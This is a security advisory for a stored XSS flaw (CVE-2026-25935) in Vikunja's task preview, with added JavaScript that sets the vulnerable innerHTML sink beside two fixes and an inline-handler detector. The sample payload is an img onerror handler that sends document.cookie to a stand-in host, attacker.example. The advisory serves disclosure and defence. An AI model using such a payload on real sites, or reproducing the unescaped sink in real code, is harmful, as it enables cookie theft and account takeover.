CVE-2026-25935: Vikunja Vulnerable to XSS Via Task Preview
The task preview component creates an unparented (detached) div and sets its innerHTML to the unescaped description of the task. Because the description is parsed as HTML rather than displayed as text, anyone who can edit a task's description can store markup that runs in the browser of every user who previews that task (stored cross-site scripting). Leaving the div unattached does not mitigate this: assigning innerHTML still runs the HTML fragment parser, which creates elements such as img, and the browser attempts to load their sources and fires inline handlers like onerror without the element ever entering the document. Script elements inserted through innerHTML do not execute, so a realistic payload uses an event-handler attribute instead.
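The following is an added example, not Vikunja's code or the referenced fix: it shows the shape of the innerHTML sink described above beside two ways to close it (assigning textContent, or escaping before assignment), plus a small check that a unit test or CI step can run over rendered markup. The payload, the element helper and the function names are constructed for illustration; the assumption is that task descriptions are untrusted text from any user who can edit the task and that the preview only needs to show that text.

```javascript
// Added example, not Vikunja's code: the innerHTML sink the advisory describes,
// beside two ways to close it. Assumes task descriptions are untrusted text
// supplied by any user who can edit the task, and that the preview only needs
// to display that text, not render markup inside it.

// Constructed sample payload standing in for a hostile task description.
// innerHTML never executes <script> elements, so a realistic payload uses an
// element with an inline event handler instead. The fragment parser creates the
// <img> even on a detached div, the browser attempts to load "x", and onerror runs.
const MALICIOUS_DESCRIPTION =
  'Buy milk <img src=x onerror="fetch(\'https://attacker.example/?c=\' + document.cookie)">';

// Vulnerable shape: untrusted string parsed as markup.
function previewVulnerable(el, description) {
  el.innerHTML = description;
  return el;
}

// Fix A: assign the description as text. The DOM stores it literally and any
// later serialisation of innerHTML comes back escaped.
function previewAsText(el, description) {
  el.textContent = description;
  return el;
}

// Fix B: escape the HTML-significant characters first, for code paths that
// must still build the preview as an HTML string.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function previewEscaped(el, description) {
  el.innerHTML = '<p class="task-preview">' + escapeHtml(description) + '</p>';
  return el;
}

// Cheap regression check for a unit test or CI grep: does a markup string still
// contain a tag carrying an inline on* handler? This is a detector for this
// specific bug class, not a sanitizer; if some HTML must be allowed through,
// use a real sanitizer such as DOMPurify.
const INLINE_HANDLER = /<[^>]*\son[a-z]+\s*=/i;
function hasInlineHandler(html) {
  return INLINE_HANDLER.test(html);
}

// Stand-in for a detached element so the example runs under Node; in a browser
// use document.createElement('div') instead.
function detachedElement() {
  return { innerHTML: '', textContent: '' };
}

function demo(description = MALICIOUS_DESCRIPTION) {
  const vulnerable = previewVulnerable(detachedElement(), description);
  const asText = previewAsText(detachedElement(), description);
  const escaped = previewEscaped(detachedElement(), description);
  return {
    vulnerableHtml: vulnerable.innerHTML,
    vulnerableHasHandler: hasInlineHandler(vulnerable.innerHTML), // true
    textStoredLiterally: asText.textContent === description,      // true
    escapedHtml: escaped.innerHTML,
    escapedHasHandler: hasInlineHandler(escaped.innerHTML),       // false
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

Prefer Fix A wherever the preview is plain text: it removes the parser from the path entirely. Fix B belongs only where a template string is unavoidable, and it must be applied at the point of assignment, not upstream on storage, so that descriptions are still stored unmodified and rendered safely by every consumer. A Content-Security-Policy without unsafe-inline would block the inline handler in this particular payload, but that is defence in depth, not a substitute for fixing the sink.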
References
- github.com/advisories/GHSA-m4g2-2q66-vc9v
- github.com/go-vikunja/vikunja
- github.com/go-vikunja/vikunja/commit/dd0b82f00a8c9ded1c19a1e643a197c514be6d37
- github.com/go-vikunja/vikunja/releases/tag/v1.1.0
- github.com/go-vikunja/vikunja/security/advisories/GHSA-m4g2-2q66-vc9v
- nvd.nist.gov/vuln/detail/CVE-2026-25935